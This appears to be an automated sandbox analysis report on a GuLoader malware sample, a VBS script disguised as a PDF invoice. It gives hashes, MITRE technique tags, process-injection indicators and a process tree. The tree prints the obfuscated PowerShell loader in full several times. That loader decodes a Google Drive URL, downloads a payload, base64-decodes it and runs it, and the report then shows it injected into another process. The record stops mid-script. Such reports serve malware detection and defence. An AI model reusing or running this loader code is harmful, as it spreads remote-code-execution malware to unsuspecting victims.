guloader | 645e4eea68674f941ad022f1470287f2fd140937b5df5aad9b084ba9db2d9c1c

General

Target

Factura_019827156·pdf.vbs
Size

30KB
MD5

f7c51f5b7f54d32f737986ddc8e72cd7
SHA1

5cd384df138b60f1d42c8c0067f493c30028771d
SHA256

645e4eea68674f941ad022f1470287f2fd140937b5df5aad9b084ba9db2d9c1c
SHA512

91dc23ede4c683feb25594d67e2e6038362b3ee1490d813a61129e038cc88b3719af9f26cf1580de561f26a188065a8d654541ecfe84bf8b66fdaa86471f7a8c
SSDEEP

384:3cb8FSMdEtNU3PgCDZYNqkUTtD1WYDJO8HbLc252J:u8FRwSYCDGYDTtEYDJLHnc

Score

10^/10

guloader discovery downloader execution

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2288	WScript.exe
5	2756	powershell.exe
7	2756	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2756	powershell.exe
772	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
5	drive.google.com
10	drive.google.com
4	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2384	wabmig.exe
2384	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
772	powershell.exe
2384	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 772 set thread context of 2384	772	powershell.exe	37

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
772	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2756	powershell.exe
772	powershell.exe
772	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
772	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	772	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2384	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 2756	2288	WScript.exe	30
PID 2288 wrote to memory of 2756	2288	WScript.exe	30
PID 2288 wrote to memory of 2756	2288	WScript.exe	30
PID 2756 wrote to memory of 2768	2756	powershell.exe	32
PID 2756 wrote to memory of 2768	2756	powershell.exe	32
PID 2756 wrote to memory of 2768	2756	powershell.exe	32
PID 2756 wrote to memory of 588	2756	powershell.exe	34
PID 2756 wrote to memory of 588	2756	powershell.exe	34
PID 2756 wrote to memory of 588	2756	powershell.exe	34
PID 588 wrote to memory of 772	588	cmd.exe	35
PID 588 wrote to memory of 772	588	cmd.exe	35
PID 588 wrote to memory of 772	588	cmd.exe	35
PID 588 wrote to memory of 772	588	cmd.exe	35
PID 772 wrote to memory of 2992	772	powershell.exe	36
PID 772 wrote to memory of 2992	772	powershell.exe	36
PID 772 wrote to memory of 2992	772	powershell.exe	36
PID 772 wrote to memory of 2992	772	powershell.exe	36
PID 772 wrote to memory of 2384	772	powershell.exe	37
PID 772 wrote to memory of 2384	772	powershell.exe	37
PID 772 wrote to memory of 2384	772	powershell.exe	37
PID 772 wrote to memory of 2384	772	powershell.exe	37
PID 772 wrote to memory of 2384	772	powershell.exe	37
PID 772 wrote to memory of 2384	772	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Factura_019827156·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Burthen milieuret Preterient Unseliness regiving Skraldets Align #>;$misthrive='Hyperconsciousness';<#Overbaked Returvrdiens Kodninger Elegikerne Ean Blasfemikerens #>;$Milksick=$host.PrivateData;If ($Milksick) {$Unstatutory++;}function Forordnings($Mutuary195){$Uncynically=$Mutuary195.Length-$Unstatutory;for( $Margravate=5;$Margravate -lt $Uncynically;$Margravate+=6){$Mitras+=$Mutuary195[$Margravate];}$Mitras;}function Dagpaafuglejernes($Nomisma){ . ($Konomidirektren) ($Nomisma);}$Dublerende=Forordnings 'PittaMLandso Rumbz Preci LeonlSchrvl OrdraPrlud/Na ur5epide.Recen0Napol beamm( SpilWAnvenicas snCumbed.mtmaoNema,wHjemmseter. Horr,NPanthTsympa Int 1Galli0Nonan.Udraa0 Chas; Semi Minu,WAbsuri Chern epen6Bundt4wyles;Aplas uppuxPu ke6Abati4B ska;Ant a A titrTransvThu d:.alla1Hekto2Grynt1G hej.Wi lp0 Po l)Janne C rviGRo,tieManagcP litkdubleoSol t/Defin2Lech,0Portu1Pent 0 E ke0Signe1 Yper0Ti.fr1Succo ArgumFFolkei eunrMeileeFravifUnstio Srgextreaa/ aran1pro,e2skgv 1Maski.Event0Selva ';$trlagtes=Forordnings 'tryghUTri hSLapare ikonrU lbs-HelioaTi bugblokkERefe NFrot TA lae ';$Akutte=Forordnings 'C kelh dsotTull,t NoltpSupers,ellh:Annu,/Indam/ aandd Si prSamseiSyng vSols ePurga. KvisgDiaduoFea,uoTilfogSup rl epile Hand. Uns cCh.atoPathomembry/Key ouFluorcPorti?B.usheSynkrx HairpDisutoTryknrSekt.tkonf =KvadrdPe,ikoSvingwGallen VantlNoncooImpaia VattdRende&BonviiGenbrdNonam=Un ig1L ebrpBl ndnW,ureR Dea vOkk,rYElysiVEgyptbSau.tBOpk v5Vi.myfT ivad orseZ drquuSoubrXSdvandPrediqAlbuq5Ledv BYng,eaHjem 0.ilmiW AuriG Surmcpo du0NinepzUnintbBesvr2Fo bid FlseJFrdseSGloamLRobin3Curta ';$Grntsagens=Forordnings 'Slave>Omso ';$Konomidirektren=Forordnings 'Vaasei falEIdyllXEf re ';$Provianterede='Psephite';$Ballasteringer = Forordnings ' PliceDext cJin.shKano oOmmat Holos%DamokaExpe,p OvalpU pold.jemva,anintForskaF,ont%Vurde\ ,aikMStemma MegagBilletRegnseC.eesrDagues Rom..MakulFOvergeInflamCo.ci Hjer&B erg&Tribu ForkyeO tcuc icrhsagnfoAntae NoncotBo tv ';Dagpaafuglejernes (Forordnings ' Reho$ ConvgTidsmlReinao yocabThegna Maskl Frev:,utpaDTomatrSlageoSeminwDevousSka.oe Podddmonsu= Hydr(Han.lc ordlmVertid egns Autob/ esorc Larm Deper$ UnisBSprayaUnfellBrechlSandbaPartisboothtKa reeTheatrHv deiL,ndsnProcegFarvee KoelrBehav)Frimu ');Dagpaafuglejernes (Forordnings 'Bd fo$,hampgmodpol C,mmoUds nbLootaaAfbinl Klip:f eckUFrafad SkolkDiffeaStubcsPr,tet Mik nIsoseiKlynknBallig MinieMorter DactnMesioeDishrs dbid=Ocyte$ BaraAForv,kSmdedu SpidtEnesst RangeCultr.Kalkus agetp Peril husai pithtLam,e(Ufrug$TagudGsom lrKloaknEtaget abous ataaNon agCosimeForbinprocusGlist)Celle ');Dagpaafuglejernes (Forordnings 'Alcid[ SemiNPseudeSammetkende.NavngSOkupue othir S.mmvT ngfiFol ecChaukeVing Pbrigaom.uthiUtfannVandbtLrestM,lassa rstinMaadea,betygDi.uleDe,ecrPap r]viktu:Obtur:ChresS IndeeAv.ncc.illeu cor rDatatipagnet Pr gy Con PUdf irtaa eoTi,litForsooNonaccFlicko Pr ll calc G.und=Siffl Flaad[SlottNSalgseHovedtStj.r.CoralSAppraeF,lkecUdstyuVolcarstipui SkibtForury BranPBestvrAerodoFe lvt BrunoBootbc T meoTeo il,poapT UnteyV,lsepSem,ceUng.a]Slu h:Fredn:gyberT.ashilP ikksCylin1Kidle2Estee ');$Akutte=$Udkastningernes[0];$Fritnkeres= (Forordnings 'Weal.$peasag Hri LSu.fuoDiremB VittaE.levlUncha:Di niK FdreOFermtl NormdUnderSgrfviv SnapebnhrejUnexpS PercNKindtIur exnomdmmgE emiE fururPhytonDinereAttem=Ress,N phonEKatedw Ubet-droukO KnsobsubsejEfterEVirkncGastrTb,nep YucasStenfyfora,s,nkastheksaeMaksimrg rl.daglinBi.cle AffjtVerde.AfterW CirceRem tB.ucklC Dvrgl Uni IB gogEKo veN ForeT');$Fritnkeres+=$Drowsed[1];Dagpaafuglejernes ($Fritnkeres);Dagpaafuglejernes (Forordnings 'Quave$ ranK St,po,sperlSjlerd ArmisFiksevH.lspeBjl ejsi,vesAffyrnProlei DrifnNavnegIrri e S edrDris nReg.ee Occi.UnnorHFleksePreinaAlderd CimseWreckrLing sSi de[ ompl$Sanset NdrirUna tlAskebaHjertgP shetPyriteC kors Reho] Efte=Dirch$A bejDElutiuSucc bDisprl Spo eForsarD llee Slicn,rophdsi ype Hook ');$Lenvoi=Forordnings ' Afsp$Seve K.inneoprcislO erpdHistosEmbalvTaxake Mo kj Aposs stilnSammei KultnRecocgWaukeeGoupirPullinRetsgeSt ns. SelvDNathaoSammewBu genHenkalVerm oRe sva Tilld addlFQuer,i MildlKatedeLerpi(Excee$SkattA Bo fk mptouHudstterrattStamaeShall,Prehe$ epolSEnergcWidgeiS,rlyl iplolThr mamicroiAfstinOempo) liff ';$Scillain=$Drowsed[0];Dagpaafuglejernes (Forordnings 'M.ske$,opulgajangLHjrepo,frerBanimuAA.aviLPa,ru:redegs Fretp No dYPunkyt Chuht AbsteEfternSvineDh.intEBase =Forr (LgnerTStt semolehsDragstFilib-Or hoPAcroaAAteleTsternHbryg Shikr$Tima.sDick c,ubtuIMi jkl S rilFarina espoi s.ienSamme)Pa in ');while (!$Spyttende) {Dagpaafuglejernes (Forordnings 'defin$ BallgSkuddlarenao BegybKamacaingellinter:odontSVakuuuPolymbMyrrasSladrcBarmhrUnknoi S.olbBesvieSubvi= verf$ EksptAelurrSk lnuSteree Fe l ') ;Dagpaafuglejernes $Lenvoi;Dagpaafuglejernes (Forordnings 'LyksaSpuddet.agrea StrerDa matRetur- SkppSTertil MetaeSokkeeBegynp,onni Rapt4clist ');Dagpaafuglejernes (Forordnings 'Nutri$Mct.igOmniflHock oGentobForsmaNaboflSamme:RomdiS Srgepsli,eyTveknt Be.ktImpreeOverpnStegedSept eStukk=Pant (StrmnTBassieSljfesBritctBundg-DentnPSole.aSalu,tTermihAbsqu Fortr$BrnepSTran.cTilvniKruselSympal xsanaUngabiSammenLspek)Lejev ') ;Dagpaafuglejernes (Forordnings 'Adels$PelergadenolSaroto PulsbDist a N tilGespe:Hete SOmdeftAphidaMyn,isFnugfo Aldep kefoh Disco Spatb rovii EpinaUdrke=Lgede$Interg Brutl O,gaoEff kbInfriaBu anlselv :RokkeP arnihfremtibuddilHol.deSlyngaDekres Bore+Feder+Nonin%Flitc$Ka alUTpishdInterkUniveaBr.ecsDispatCroonnGiganiAlbumnOversgMelleeCannorTub.rnFrerbekristsSab.a.C ttycFad ro Kyaru overnHemict Tast ') ;$Akutte=$Udkastningernes[$Stasophobia];}$Margravatemmatrikulerede=343556;$Semihyperbolic171=29709;Dagpaafuglejernes (Forordnings ' uxan$ HovegTosenlP,ncroTisseb ProsaHeterlTrbaa:SurinFIndbarUnst eDkskomStyrmk Undea KredlMode.dMonoreAdg nrMise sCrede subju= C.ll GrassGLe toeA,bejtdigtn-FanebCRykkeoTllevnSemiatConveeHelixnDr prtSkewh Blan $ EuloSMythicForkoiTilfjl SpanlUnfacaPurreibredsnK mpl ');Dagpaafuglejernes (Forordnings 'Sla b$ScaleganstolSpor.oDevilbPseuda umpiltilgr:uranoEFlsk,lAnteseKnojev Aquis indfkBegotoHaecclRabaneFrgerrOdontn fornePr acsPleje Unf.d=Snd r Udvid[SamarS marlyfleecs rteltM dleeTandpmSlut . KaraCForfoo St rn Untov SargeSilker Overt Beth]Strat: ,ort:dis eFDosmerOverhoSprinmA tirB Fa laMrkblsAfkale Stor6udomo4Verm SF.lchtMon crBalisiBlac.n onolgslge.(Trlas$SamhpFBolchrCyc aeBlafrmP estkBiomialad llAnvendIn.ereSwizzrStatuspostv) Firl ');Dagpaafuglejernes (Forordnings 'Garde$hundeg Fil lBronkoDem nb Th oaOzonrl Alky:SkattOModehute ratNonsur F emaKinemu.rowdgMetalhtaxont Non. Vener= tedb rth[ PeriSBrystyT,nehsPuncttInddreTwptymCloth.StangTSupraeGanapxA bejtL,gga. ulorEHjemmnStea csnowsoBltesdData iHje,tnData g Dybd]Vigte:Brugs:A hioAM sfoSSnoolCIslicIKoordIV ndr. dfylG eproeHngedtStjerSPeachtSan,krUnporiUng rn.antogSalca( Trov$OutraECisellTvangeFlorov R pssEnebrkOpsk oSky.nlJuliae ErklrUdspynTrappeCul ysTownm) Slem ');Dagpaafuglejernes (Forordnings 'Regl $Sk esgTorrelBoagao T,nabEner aQuadrl Vent:DisalF OmstoBrugerStudeb rkosrJ.wesyUdlugdR nkseF rtir Lbl aGrundlUomtvbB nehuUdformtelevsTendr=dbers$OrifaO Akkvu VinktA skarSikk aHarmouottergStrithToogtt Humo.Hnge,s Rhacu Hamsb,aligsCren tWafturMassriOli dn efeg Zone(Devia$KunstMupsuraSamplrHy.ergSphaerJe,nva Anl vknoutaFunictKastre ggermPlanomMeconaSt.klt Butir SuediActinkAdhe uNomenlRes ae AnatrStemneAli odpandaeFste ,Besmr$ algS Junie vulom ammeiEthanhPolaryTelefp R gseGowkerFloteb otlioTrus,lSynkriU,eupc Drys1 unde7Energ1Ar al) aart ');Dagpaafuglejernes $Forbryderalbums;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magters.Fem && echo t"
    3⤵
    PID:2768
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Burthen milieuret Preterient Unseliness regiving Skraldets Align #>;$misthrive='Hyperconsciousness';<#Overbaked Returvrdiens Kodninger Elegikerne Ean Blasfemikerens #>;$Milksick=$host.PrivateData;If ($Milksick) {$Unstatutory++;}function Forordnings($Mutuary195){$Uncynically=$Mutuary195.Length-$Unstatutory;for( $Margravate=5;$Margravate -lt $Uncynically;$Margravate+=6){$Mitras+=$Mutuary195[$Margravate];}$Mitras;}function Dagpaafuglejernes($Nomisma){ . ($Konomidirektren) ($Nomisma);}$Dublerende=Forordnings 'PittaMLandso Rumbz Preci LeonlSchrvl OrdraPrlud/Na ur5epide.Recen0Napol beamm( SpilWAnvenicas snCumbed.mtmaoNema,wHjemmseter. Horr,NPanthTsympa Int 1Galli0Nonan.Udraa0 Chas; Semi Minu,WAbsuri Chern epen6Bundt4wyles;Aplas uppuxPu ke6Abati4B ska;Ant a A titrTransvThu d:.alla1Hekto2Grynt1G hej.Wi lp0 Po l)Janne C rviGRo,tieManagcP litkdubleoSol t/Defin2Lech,0Portu1Pent 0 E ke0Signe1 Yper0Ti.fr1Succo ArgumFFolkei eunrMeileeFravifUnstio Srgextreaa/ aran1pro,e2skgv 1Maski.Event0Selva ';$trlagtes=Forordnings 'tryghUTri hSLapare ikonrU lbs-HelioaTi bugblokkERefe NFrot TA lae ';$Akutte=Forordnings 'C kelh dsotTull,t NoltpSupers,ellh:Annu,/Indam/ aandd Si prSamseiSyng vSols ePurga. KvisgDiaduoFea,uoTilfogSup rl epile Hand. Uns cCh.atoPathomembry/Key ouFluorcPorti?B.usheSynkrx HairpDisutoTryknrSekt.tkonf =KvadrdPe,ikoSvingwGallen VantlNoncooImpaia VattdRende&BonviiGenbrdNonam=Un ig1L ebrpBl ndnW,ureR Dea vOkk,rYElysiVEgyptbSau.tBOpk v5Vi.myfT ivad orseZ drquuSoubrXSdvandPrediqAlbuq5Ledv BYng,eaHjem 0.ilmiW AuriG Surmcpo du0NinepzUnintbBesvr2Fo bid FlseJFrdseSGloamLRobin3Curta ';$Grntsagens=Forordnings 'Slave>Omso ';$Konomidirektren=Forordnings 'Vaasei falEIdyllXEf re ';$Provianterede='Psephite';$Ballasteringer = Forordnings ' PliceDext cJin.shKano oOmmat Holos%DamokaExpe,p OvalpU pold.jemva,anintForskaF,ont%Vurde\ ,aikMStemma MegagBilletRegnseC.eesrDagues Rom..MakulFOvergeInflamCo.ci Hjer&B erg&Tribu ForkyeO tcuc icrhsagnfoAntae NoncotBo tv ';Dagpaafuglejernes (Forordnings ' Reho$ ConvgTidsmlReinao yocabThegna Maskl Frev:,utpaDTomatrSlageoSeminwDevousSka.oe Podddmonsu= Hydr(Han.lc ordlmVertid egns Autob/ esorc Larm Deper$ UnisBSprayaUnfellBrechlSandbaPartisboothtKa reeTheatrHv deiL,ndsnProcegFarvee KoelrBehav)Frimu ');Dagpaafuglejernes (Forordnings 'Bd fo$,hampgmodpol C,mmoUds nbLootaaAfbinl Klip:f eckUFrafad SkolkDiffeaStubcsPr,tet Mik nIsoseiKlynknBallig MinieMorter DactnMesioeDishrs dbid=Ocyte$ BaraAForv,kSmdedu SpidtEnesst RangeCultr.Kalkus agetp Peril husai pithtLam,e(Ufrug$TagudGsom lrKloaknEtaget abous ataaNon agCosimeForbinprocusGlist)Celle ');Dagpaafuglejernes (Forordnings 'Alcid[ SemiNPseudeSammetkende.NavngSOkupue othir S.mmvT ngfiFol ecChaukeVing Pbrigaom.uthiUtfannVandbtLrestM,lassa rstinMaadea,betygDi.uleDe,ecrPap r]viktu:Obtur:ChresS IndeeAv.ncc.illeu cor rDatatipagnet Pr gy Con PUdf irtaa eoTi,litForsooNonaccFlicko Pr ll calc G.und=Siffl Flaad[SlottNSalgseHovedtStj.r.CoralSAppraeF,lkecUdstyuVolcarstipui SkibtForury BranPBestvrAerodoFe lvt BrunoBootbc T meoTeo il,poapT UnteyV,lsepSem,ceUng.a]Slu h:Fredn:gyberT.ashilP ikksCylin1Kidle2Estee ');$Akutte=$Udkastningernes[0];$Fritnkeres= (Forordnings 'Weal.$peasag Hri LSu.fuoDiremB VittaE.levlUncha:Di niK FdreOFermtl NormdUnderSgrfviv SnapebnhrejUnexpS PercNKindtIur exnomdmmgE emiE fururPhytonDinereAttem=Ress,N phonEKatedw Ubet-droukO KnsobsubsejEfterEVirkncGastrTb,nep YucasStenfyfora,s,nkastheksaeMaksimrg rl.daglinBi.cle AffjtVerde.AfterW CirceRem tB.ucklC Dvrgl Uni IB gogEKo veN ForeT');$Fritnkeres+=$Drowsed[1];Dagpaafuglejernes ($Fritnkeres);Dagpaafuglejernes (Forordnings 'Quave$ ranK St,po,sperlSjlerd ArmisFiksevH.lspeBjl ejsi,vesAffyrnProlei DrifnNavnegIrri e S edrDris nReg.ee Occi.UnnorHFleksePreinaAlderd CimseWreckrLing sSi de[ ompl$Sanset NdrirUna tlAskebaHjertgP shetPyriteC kors Reho] Efte=Dirch$A bejDElutiuSucc bDisprl Spo eForsarD llee Slicn,rophdsi ype Hook ');$Lenvoi=Forordnings ' Afsp$Seve K.inneoprcislO erpdHistosEmbalvTaxake Mo kj Aposs stilnSammei KultnRecocgWaukeeGoupirPullinRetsgeSt ns. SelvDNathaoSammewBu genHenkalVerm oRe sva Tilld addlFQuer,i MildlKatedeLerpi(Excee$SkattA Bo fk mptouHudstterrattStamaeShall,Prehe$ epolSEnergcWidgeiS,rlyl iplolThr mamicroiAfstinOempo) liff ';$Scillain=$Drowsed[0];Dagpaafuglejernes (Forordnings 'M.ske$,opulgajangLHjrepo,frerBanimuAA.aviLPa,ru:redegs Fretp No dYPunkyt Chuht AbsteEfternSvineDh.intEBase =Forr (LgnerTStt semolehsDragstFilib-Or hoPAcroaAAteleTsternHbryg Shikr$Tima.sDick c,ubtuIMi jkl S rilFarina espoi s.ienSamme)Pa in ');while (!$Spyttende) {Dagpaafuglejernes (Forordnings 'defin$ BallgSkuddlarenao BegybKamacaingellinter:odontSVakuuuPolymbMyrrasSladrcBarmhrUnknoi S.olbBesvieSubvi= verf$ EksptAelurrSk lnuSteree Fe l ') ;Dagpaafuglejernes $Lenvoi;Dagpaafuglejernes (Forordnings 'LyksaSpuddet.agrea StrerDa matRetur- SkppSTertil MetaeSokkeeBegynp,onni Rapt4clist ');Dagpaafuglejernes (Forordnings 'Nutri$Mct.igOmniflHock oGentobForsmaNaboflSamme:RomdiS Srgepsli,eyTveknt Be.ktImpreeOverpnStegedSept eStukk=Pant (StrmnTBassieSljfesBritctBundg-DentnPSole.aSalu,tTermihAbsqu Fortr$BrnepSTran.cTilvniKruselSympal xsanaUngabiSammenLspek)Lejev ') ;Dagpaafuglejernes (Forordnings 'Adels$PelergadenolSaroto PulsbDist a N tilGespe:Hete SOmdeftAphidaMyn,isFnugfo Aldep kefoh Disco Spatb rovii EpinaUdrke=Lgede$Interg Brutl O,gaoEff kbInfriaBu anlselv :RokkeP arnihfremtibuddilHol.deSlyngaDekres Bore+Feder+Nonin%Flitc$Ka alUTpishdInterkUniveaBr.ecsDispatCroonnGiganiAlbumnOversgMelleeCannorTub.rnFrerbekristsSab.a.C ttycFad ro Kyaru overnHemict Tast ') ;$Akutte=$Udkastningernes[$Stasophobia];}$Margravatemmatrikulerede=343556;$Semihyperbolic171=29709;Dagpaafuglejernes (Forordnings ' uxan$ HovegTosenlP,ncroTisseb ProsaHeterlTrbaa:SurinFIndbarUnst eDkskomStyrmk Undea KredlMode.dMonoreAdg nrMise sCrede subju= C.ll GrassGLe toeA,bejtdigtn-FanebCRykkeoTllevnSemiatConveeHelixnDr prtSkewh Blan $ EuloSMythicForkoiTilfjl SpanlUnfacaPurreibredsnK mpl ');Dagpaafuglejernes (Forordnings 'Sla b$ScaleganstolSpor.oDevilbPseuda umpiltilgr:uranoEFlsk,lAnteseKnojev Aquis indfkBegotoHaecclRabaneFrgerrOdontn fornePr acsPleje Unf.d=Snd r Udvid[SamarS marlyfleecs rteltM dleeTandpmSlut . KaraCForfoo St rn Untov SargeSilker Overt Beth]Strat: ,ort:dis eFDosmerOverhoSprinmA tirB Fa laMrkblsAfkale Stor6udomo4Verm SF.lchtMon crBalisiBlac.n onolgslge.(Trlas$SamhpFBolchrCyc aeBlafrmP estkBiomialad llAnvendIn.ereSwizzrStatuspostv) Firl ');Dagpaafuglejernes (Forordnings 'Garde$hundeg Fil lBronkoDem nb Th oaOzonrl Alky:SkattOModehute ratNonsur F emaKinemu.rowdgMetalhtaxont Non. Vener= tedb rth[ PeriSBrystyT,nehsPuncttInddreTwptymCloth.StangTSupraeGanapxA bejtL,gga. ulorEHjemmnStea csnowsoBltesdData iHje,tnData g Dybd]Vigte:Brugs:A hioAM sfoSSnoolCIslicIKoordIV ndr. dfylG eproeHngedtStjerSPeachtSan,krUnporiUng rn.antogSalca( Trov$OutraECisellTvangeFlorov R pssEnebrkOpsk oSky.nlJuliae ErklrUdspynTrappeCul ysTownm) Slem ');Dagpaafuglejernes (Forordnings 'Regl $Sk esgTorrelBoagao T,nabEner aQuadrl Vent:DisalF OmstoBrugerStudeb rkosrJ.wesyUdlugdR nkseF rtir Lbl aGrundlUomtvbB nehuUdformtelevsTendr=dbers$OrifaO Akkvu VinktA skarSikk aHarmouottergStrithToogtt Humo.Hnge,s Rhacu Hamsb,aligsCren tWafturMassriOli dn efeg Zone(Devia$KunstMupsuraSamplrHy.ergSphaerJe,nva Anl vknoutaFunictKastre ggermPlanomMeconaSt.klt Butir SuediActinkAdhe uNomenlRes ae AnatrStemneAli odpandaeFste ,Besmr$ algS Junie vulom ammeiEthanhPolaryTelefp R gseGowkerFloteb otlioTrus,lSynkriU,eupc Drys1 unde7Energ1Ar al) aart ');Dagpaafuglejernes $Forbryderalbums;"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:588
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Burthen milieuret Preterient Unseliness regiving Skraldets Align #>;$misthrive='Hyperconsciousness';<#Overbaked Returvrdiens Kodninger Elegikerne Ean Blasfemikerens #>;$Milksick=$host.PrivateData;If ($Milksick) {$Unstatutory++;}function Forordnings($Mutuary195){$Uncynically=$Mutuary195.Length-$Unstatutory;for( $Margravate=5;$Margravate -lt $Uncynically;$Margravate+=6){$Mitras+=$Mutuary195[$Margravate];}$Mitras;}function Dagpaafuglejernes($Nomisma){ . ($Konomidirektren) ($Nomisma);}$Dublerende=Forordnings 'PittaMLandso Rumbz Preci LeonlSchrvl OrdraPrlud/Na ur5epide.Recen0Napol beamm( SpilWAnvenicas snCumbed.mtmaoNema,wHjemmseter. Horr,NPanthTsympa Int 1Galli0Nonan.Udraa0 Chas; Semi Minu,WAbsuri Chern epen6Bundt4wyles;Aplas uppuxPu ke6Abati4B ska;Ant a A titrTransvThu d:.alla1Hekto2Grynt1G hej.Wi lp0 Po l)Janne C rviGRo,tieManagcP litkdubleoSol t/Defin2Lech,0Portu1Pent 0 E ke0Signe1 Yper0Ti.fr1Succo ArgumFFolkei eunrMeileeFravifUnstio Srgextreaa/ aran1pro,e2skgv 1Maski.Event0Selva ';$trlagtes=Forordnings 'tryghUTri hSLapare ikonrU lbs-HelioaTi bugblokkERefe NFrot TA lae ';$Akutte=Forordnings 'C kelh dsotTull,t NoltpSupers,ellh:Annu,/Indam/ aandd Si prSamseiSyng vSols ePurga. KvisgDiaduoFea,uoTilfogSup rl epile Hand. Uns cCh.atoPathomembry/Key ouFluorcPorti?B.usheSynkrx HairpDisutoTryknrSekt.tkonf =KvadrdPe,ikoSvingwGallen VantlNoncooImpaia VattdRende&BonviiGenbrdNonam=Un ig1L ebrpBl ndnW,ureR Dea vOkk,rYElysiVEgyptbSau.tBOpk v5Vi.myfT ivad orseZ drquuSoubrXSdvandPrediqAlbuq5Ledv BYng,eaHjem 0.ilmiW AuriG Surmcpo du0NinepzUnintbBesvr2Fo bid FlseJFrdseSGloamLRobin3Curta ';$Grntsagens=Forordnings 'Slave>Omso ';$Konomidirektren=Forordnings 'Vaasei falEIdyllXEf re ';$Provianterede='Psephite';$Ballasteringer = Forordnings ' PliceDext cJin.shKano oOmmat Holos%DamokaExpe,p OvalpU pold.jemva,anintForskaF,ont%Vurde\ ,aikMStemma MegagBilletRegnseC.eesrDagues Rom..MakulFOvergeInflamCo.ci Hjer&B erg&Tribu ForkyeO tcuc icrhsagnfoAntae NoncotBo tv ';Dagpaafuglejernes (Forordnings ' Reho$ ConvgTidsmlReinao yocabThegna Maskl Frev:,utpaDTomatrSlageoSeminwDevousSka.oe Podddmonsu= Hydr(Han.lc ordlmVertid egns Autob/ esorc Larm Deper$ UnisBSprayaUnfellBrechlSandbaPartisboothtKa reeTheatrHv deiL,ndsnProcegFarvee KoelrBehav)Frimu ');Dagpaafuglejernes (Forordnings 'Bd fo$,hampgmodpol C,mmoUds nbLootaaAfbinl Klip:f eckUFrafad SkolkDiffeaStubcsPr,tet Mik nIsoseiKlynknBallig MinieMorter DactnMesioeDishrs dbid=Ocyte$ BaraAForv,kSmdedu SpidtEnesst RangeCultr.Kalkus agetp Peril husai pithtLam,e(Ufrug$TagudGsom lrKloaknEtaget abous ataaNon agCosimeForbinprocusGlist)Celle ');Dagpaafuglejernes (Forordnings 'Alcid[ SemiNPseudeSammetkende.NavngSOkupue othir S.mmvT ngfiFol ecChaukeVing Pbrigaom.uthiUtfannVandbtLrestM,lassa rstinMaadea,betygDi.uleDe,ecrPap r]viktu:Obtur:ChresS IndeeAv.ncc.illeu cor rDatatipagnet Pr gy Con PUdf irtaa eoTi,litForsooNonaccFlicko Pr ll calc G.und=Siffl Flaad[SlottNSalgseHovedtStj.r.CoralSAppraeF,lkecUdstyuVolcarstipui SkibtForury BranPBestvrAerodoFe lvt BrunoBootbc T meoTeo il,poapT UnteyV,lsepSem,ceUng.a]Slu h:Fredn:gyberT.ashilP ikksCylin1Kidle2Estee ');$Akutte=$Udkastningernes[0];$Fritnkeres= (Forordnings 'Weal.$peasag Hri LSu.fuoDiremB VittaE.levlUncha:Di niK FdreOFermtl NormdUnderSgrfviv SnapebnhrejUnexpS PercNKindtIur exnomdmmgE emiE fururPhytonDinereAttem=Ress,N phonEKatedw Ubet-droukO KnsobsubsejEfterEVirkncGastrTb,nep YucasStenfyfora,s,nkastheksaeMaksimrg rl.daglinBi.cle AffjtVerde.AfterW CirceRem tB.ucklC Dvrgl Uni IB gogEKo veN ForeT');$Fritnkeres+=$Drowsed[1];Dagpaafuglejernes ($Fritnkeres);Dagpaafuglejernes (Forordnings 'Quave$ ranK St,po,sperlSjlerd ArmisFiksevH.lspeBjl ejsi,vesAffyrnProlei DrifnNavnegIrri e S edrDris nReg.ee Occi.UnnorHFleksePreinaAlderd CimseWreckrLing sSi de[ ompl$Sanset NdrirUna tlAskebaHjertgP shetPyriteC kors Reho] Efte=Dirch$A bejDElutiuSucc bDisprl Spo eForsarD llee Slicn,rophdsi ype Hook ');$Lenvoi=Forordnings ' Afsp$Seve K.inneoprcislO 